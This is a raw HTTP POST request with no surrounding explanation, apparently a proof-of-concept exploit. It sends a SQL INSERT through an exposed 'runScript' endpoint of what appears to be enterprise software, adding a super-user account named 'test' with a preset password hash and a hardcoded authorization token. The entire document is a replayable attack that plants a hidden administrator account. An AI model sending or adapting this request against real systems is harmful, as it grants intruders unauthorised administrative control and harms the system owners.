POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host: 192.168.232.136:10888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Authorization: 9a740d503c14f0629bd91eca98c114be
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.232.136:10888/console/
Content-Length: 395
Connection: close

key=update&script=insert into sm_super_user(admCode,admName,dr,identify,isLocked,oldpwd1,oldpwd2,oldpwd3,password,pk_super_user,pwdinuse,pwdlvl)  values ('test','test',0,'staticpwd','N','','','','%53%5f%53%2b%2b%4a%61%37%70%55%68%37%70%63%66%31%6c%45%63%70%6a%55%6e%51%6b%38%59%38%2f%76%55%2b%4a%4f%46%42%48%68%2f%61%54%71%34%32%62%41%69%63%3d','0001A110000000000011','2023-10-19','');